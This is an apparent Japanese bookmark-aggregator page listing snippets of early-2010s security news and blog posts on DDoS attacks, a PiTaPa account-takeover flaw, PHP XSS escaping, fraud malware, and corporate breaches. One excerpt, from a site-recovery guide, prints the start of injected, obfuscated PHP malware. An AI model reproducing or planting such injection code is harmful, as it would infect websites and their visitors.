小学生が政府サイトにDDoS攻撃 韓国・ゲーム規制に反発 (ITmedia ニュース) - Yahoo!ニュース
政府のゲーム規制に反発した小学生らのグループが、政府サイトにDDoS(分散型サービス拒否)攻撃を仕掛け、警察に摘発される事件が韓国で起きた。 3月7日付けの朝鮮日報(電子版)によると、摘発されたのは小学生3人を含む7人の少年グループ。小学生は4年生1人と6年生2人で、最年長は高校2年生という。 グループは1月下旬、韓国の女性家族部(「部」は日本の「省」に相当)のWebサイトに対し、DDoS攻撃を4回にわたって仕掛けたが、今月6日に警察に摘発された。当局は事前に計画を察知し、該当するIPアドレスを遮断したことから、サイトに被害はなかったという。 韓国では昨年11月、16歳未満の青少年がオンラインゲームの利用を午前0時から午前6時まで禁じる規制が導入された。規制を進める女性家族部に対し、ティーンエイジャーによる抗議集会も開かれるなど、反発は強い。 7人はネット上の「女性家族部アンチカフ
これはヒドイ。PiTaPa倶楽部はアカウント乗っ取りを公式に推奨中 - それマグで!
ある日、Twitterを見ていると。「ピタパクラブは上書き登録可能。」と見かけた。 #pitapa 倶楽部がひどいのは、とあるカードに対してユーザー登録が既に行われてても、上書き登録ができてしまうこと。なので、攻撃者が対象者のアカウントを上書きすることが可能になるという凄い実装。 https://twitter.com/#!/cetacea/status/174094663861542912 そうだったの・・・知らなかったです。上書き登録出来るとかヤバイんじゃないの?早速試してみよう。 ピタパを知らない人に解説すると、ピタパは、パスモに先駆けて、関西私鉄で使える交通ICカード。後払いが特徴。あとから回数券分相当が割引されて請求される。とっても便利なサービス。 Pitapa倶楽部はID乗っ取りが可能。 登録済みPiTaPaに対して、ID乗っ取りが可能です。実際に試しました。 でも悪いことじゃ
サイバー攻撃って本当にヤバかったんですね - やまもといちろうBLOG(ブログ)
古典的な情報アプローチに従事している人だと、どうしてもサイバー攻撃とサイバーテロの違いを知らないまま、どこか遠くで起きているものであるとか、技術的なものだから技術方面が対策するものといった認識を持つ場合が多くてですね。まあ、要するに「俺には関係ねえ」という話になりやすいんですけれども。 NASAに執拗なサイバー攻撃、情報流出やネットワークの乗っ取り被害も http://www.itmedia.co.jp/enterprise/articles/1203/05/news012.html NASA victim of 13 major cyber attacks last year http://tvnz.co.nz/world-news/nasa-victim-13-major-cyber-attacks-last-year-4755356 Lawmakers concerned about
PiTaPa利用者への注意 - とある技術屋の戯言
要点 PiTaPa倶楽部に第三者が登録するのを防ぐため、以下の点は必ず守りましょう カード裏面に記載されている会員番号、カードID、有効期限は絶対に秘密にすること PiTaPa倶楽部には必ず登録し、毎日ログインすること カードを長期間利用しない場合は解約を検討すること 理由 PiTaPa倶楽部に登録するには 会員番号 カードID 有効期限 (以上カード裏面記載) 生年月日 電話番号 が必要です。逆に言えば、これだけの情報があれば、誰でも会員になりすまして登録可能です。 PiTaPaで決裁した際のレシートにはカードIDが記載されている場合があるので必ず回収しましょう。また、会員番号やカードIDを入力するサービスは絶対に使用してはいけません。PiTaPaは、カード裏面の情報は秘密にしなければならない、本人しか知り得ないはずである、と説明しています。一方で、加盟店が独自にカードIDや会員番号を収
5分でできるPHPセキュリティ対策 - ぼくはまちちゃん!
こんにちはこんにちは!! Webプログラミングしてますか! よく「PHPはセキュリティがダメ」とか言われてるよね。 でもそれって、べつにPHPが悪いんじゃなくて、 たぶん、セキュリティとかが、まだよくわからない人が多いだけなんじゃないかな。 がんばって勉強しようと思っても、なんだか難しい理屈が並んでいたりするしね…。 なので今日は、セキュリティ対策について、 「これだけやっとけば、わりと安全になるよ」ってことを、初心者むけに、大雑把に書いてみます! 理屈がわからなくても、最初はコピペでも、 なにもやらないより、やったほうがきっとマシになる! 1. XSS対策 動的なものを表示するとき、全部エスケープすればokです! (NG) あなたの名前は <?= $name ?> ですね! ↓ (OK) あなたの名前は <?= htmlspecialchars($name, ENT_QUOTES) ?>
PCウイルス:「ワンクリック詐欺」で立件へ 京都府警 - 毎日jp(毎日新聞)
わいせつ画像がパソコン画面から消えなくなるウイルスをダウンロードさせたとして東京都内の男ら6人が不正指令電磁的記録(ウイルス)供用容疑で逮捕された事件で、京都府警は8日、男らがウイルスに感染させた人が約110万人に上り、画像を消すための登録料として今年1月までの1年間で1万人に総額約6億円を振り込ませていたと発表した。府警は同種手口では被害が最大規模の「ワンクリック詐欺」とみて、詐欺容疑での立件を視野に捜査を進める。 府警によると、逮捕された東京都世田谷区太子堂1、会社役員、堀本真也容疑者(33)らは求人広告などで技術者を集め、21の法人名義で口座を開設。アダルト・芸能情報の提供サイトを毎日20個作成して、アクセスした利用者をアダルトサイトに誘導、動画視聴を装ってウイルスをダウンロードさせていた。 堀本容疑者らは数年前からインターネットを利用した振り込め詐欺を行っていたが、振り込みが減って
脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
ネット上で「忘れられる権利」…欧州委が法案 : 国際 : YOMIURI ONLINE(読売新聞)
【ブリュッセル=工藤武人】欧州連合(EU)の執行機関、欧州委員会は25日、インターネット上の個人情報保護のため、利用者がネット事業者に情報の削除を要求できる「忘れられる権利」を盛り込む法案をまとめた。 違反には最高100万ユーロ(約1億100万円)の罰金が科される。EU域内で活動している世界中の企業が適用対象で、ネットを利用した事業展開に影響しそうだ。施行は、欧州議会と27加盟国の承認を得てから2年後となる。 「忘れられる権利」は、EUが提唱する新しい概念。ネット上の情報を個人では削除しきれないことに対応したもので、法施行後は、利用者が名前や写真、クレジットカードの情報といったデータの削除を求めれば、ネット事業者は、報道目的など正当な理由がない限り情報管理を行うサーバーから抹消しなければならない。
朝日新聞デジタル:〈ニュース圏外〉密かに続くネット流出 さらす側の本音
ログインID、パスワードを入力し「ログイン」ボタンを押してください。 ※ログインID、パスワードをお持ちでない方は、ご購読申し込みページにてお手続きください。 ※ログインID、パスワードをお持ちの方でもご購読手続きを済ませていない方はログインできません。 ログインID(メールアドレス)
ストールマン師語る - セキュリティホール memo
.NET Framework 1.1 / 2.0 / 3.5 / 3.5.1 / 4 に 4 つの欠陥。 ハッシュテーブルの衝突がサービス拒否を引き起こす可能性のある脆弱性 CVE-2011-3414 Effective DoS attacks against Web Application Plattforms ? #hashDoS [UPDATE2] の件。Exploitability Index: 3 .NET フォームの認証の安全ではないリダイレクトの脆弱性 CVE-2011-3415 .NET Framework 1.1 には影響しない。 Exploitability Index: N/A ASP.Net フォームの認証バイパスの脆弱性 CVE-2011-3416 Exploitability Index: 1 ASP.Net フォームの認証のチケットをキャッシュする脆弱性 CV
非技術者のためのOAuth認証(?)とOpenIDの違い入門【2023年版】
昔から、「OpenIDは認証でOAuthは認可だ」などということが言われます。しかし、その言語の意味を取り違えている方が結構多い気がしています。「もうOpenIDなんていらね。OAuthだけでいいじゃん」というような言説がよく流れてくるのがその証拠だと思います。OAuth認証というのもその類ですね。 そこで、今日はOAuthとOpenIDの違いを考えてみたいと思います。 OpenIDは紹介状、OAuthは合鍵 まずはOpenIDの概要の復習です。「OpenIDは認証」という言葉の内容をまずは復習してみましょう。 「認証」とは大変広い言葉でいろいろな場面で使われますが、「OpenIDは認証」という使い方の時は、「OpenIDは、いま来ている人の身元を認証」(ユーザ認証)という意味です。図にすると図1のような流れになります。 この例では、有栖さんがお客としてサービス提供をしているサイトである伊
サードパーティCookieの歴史と現状 Part1 前提知識の共有 - 最速転職研究会
Web開発者のためのサードパーティCookieやらトラッキングやらの問題点について三回ぐらいに分けて書きます。 この文章は個人的に書いていますので、おい、お前のところのサービスがサードパーティCookieに依存してるじゃねーかというツッコミがあるかもしれないが、そういうことを気にしているといつまで経っても公開できないという問題が出てしまうので、そんなことはお構いなしに書く。ちなみに例外なく自社サービスに対してもサードパーティCookieに依存するな死ねと言っている。これはWebプログラマー観点で、自分がサービス開発に関わる上で知っておかねばならないだろう知識として十数年間だらだらとWebを見ていて自然に知っていたものと、あるいは興味を持って率先して調べたものが含まれている。ググッて直ぐに分かる程度の用語の定義的なことは書かない。あくまでWebサイト制作者側からの観点なので、ブラウザ開発関係
仮装空間「アメーバピグ」で詐欺や盗み、子供ら被害 - 日本経済新聞
インターネット上の仮想空間サービス「アメーバピグ」を巡り、小学生を含む未成年者による違法行為などが相次ぎ、警察や教育関係者らが警戒を強めている。運営するサイバーエージェント(東京)も対策強化を進めているが、不正行為のすべてをチェックすることは難しいという。2~9月、愛知県警が同県など6県の小学5年~中学2年の男女8人を不正アクセス禁止法違反容疑で摘発した。8人はメールを通じて他者のIDやパスワ
asahi.com(朝日新聞社):200自治体のHPに不具合 富士通にサイバー攻撃 - 社会
印刷 関連トピックス富士通 富士通は10日、同社のサーバーが9日にサイバー攻撃を受け、同社が管理する10県と百数十市町村、計約200自治体のホームページ(HP)上のサービスに不具合が出たことを明らかにした。電子申請システムが断続的に利用できない状態になったという。千葉や静岡、福岡各県などで影響があったが、10日朝までにはすべて復旧した。 富士通によると、9日午後、外部の30以上のIPアドレスを通じ、サーバーに大量のアクセスが繰り返された。システム処理が追いつかない状態になり、サーバーとインターネットの接続を一時切断したという。 この影響で、ネットを通じて職員採用試験の受験や水道の使用開始など各種申し込みをする自治体の電子申請システムが断続的に利用できなくなった。アクセス元は特定はできていないが、ウイルスへの感染はないという。同社は「攻撃の具体的な中身がわかっていないので、状況を把握し
asahi.com(朝日新聞社):軍事・原発情報が流出か 三菱重へのサイバー攻撃 - 社会
印刷 関連トピックス原子力発電所 三菱重工業がサイバー攻撃を受けた事件で、戦闘機などの防衛装備品や原子力発電所に関する情報が流出していた疑いのあることが関係者への取材でわかった。情報が外部に送信された痕跡が残っており、何者かが盗み取った可能性が高いという。三菱重工のウイルス感染をめぐって軍事情報などの流出の疑いが浮上したのは初めて。 三菱重工へのサイバー攻撃は8月に発覚。潜水艦や護衛艦を建造する神戸造船所や長崎造船所、ミサイル関連製品を製造する名古屋誘導推進システム製作所(愛知県小牧市)など計11カ所でサーバーとパソコン計83台がウイルスに感染していた。三菱重工は「製品情報や顧客情報などの流出は確認されていない」としていた。 しかし、関係者によると、三菱重工が国内の別のサーバー数十台を追加調査したところ、一部で軍事や原発の情報を送信した痕跡が残っていたという。 続きは朝日新聞デジタル
ネットバンキング:不正引き出し2億8000万円被害 - 毎日jp(毎日新聞)
インターネットバンキングの利用者の預金が他人名義の口座に送金され、ATM(現金自動受払機)から現金が引き出される被害が今年4月から53の金融機関で133件発生し、被害額は約2億8000万円に上ることが警察庁の調べで分かった。利用者のパソコンに不正プログラムを侵入させ、抜き取ったID・パスワードを使ってネットバンキングにアクセスする手口が目立つ。警察当局は電子計算機使用詐欺や不正アクセス禁止法違反容疑で捜査している。 ◇目立つパスワード不正入手 不正送金の被害のあった金融機関は、都市銀行4行▽地方銀行32行▽信用金庫9行▽ネット専業銀行2行▽その他6行。1分ごとに数字が変更される使い捨て型の「ワンタイムパスワード」では被害はなく、ほとんどは盗まれた固定式パスワードが悪用された被害だという。警察庁は、ワンタイムパスワードの普及などセキュリティー対策の強化を金融機関に要請している。 警察庁による
「欠陥ドメイン名」が世界的に増えそうな件について:Geekなぺーじ
JPRSが「JPRSが、地域に根ざした新たなドメイン名空間「都道府県型JPドメイン名」の新設を決定」というプレスリリースを出しましたが、それに対して高木浩光氏から問題提起及び公開質問状のが行われました。 さらに、徳丸浩氏が、実際にcookieで問題が発生することを検証されていました。 高木浩光@自宅の日記: JPRSに対する都道府県型JPドメイン名新設に係る公開質問 徳丸浩の日記: 都道府県型JPドメインがCookieに及ぼす影響の調査 高木浩光氏が以下のように述べられています。 何もしなければ、「都道府県型JPドメイン名」の登録が始まっても、cookieを利用できないなどの欠陥ドメイン名となることが予想される。 「都道府県型JPドメイン名」が開始されるにあたって、指摘されているような問題は実際に発生すると思われるので、JPRSが公開質問状に答えることを期待したいところです。 で、今回のこ
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
セキュリティ研究者が新たなHTTP DoS攻撃手法を考案――検知しにくい特徴も|セキュリティ・マネジメント|Computerworld
児童ポルノのブロッキングが奏功? 裏DVD通販の大手グループが軒並みサイト廃業か 
国土地理院のサーバーに“辞書攻撃” : 社会 : YOMIURI ONLINE(読売新聞)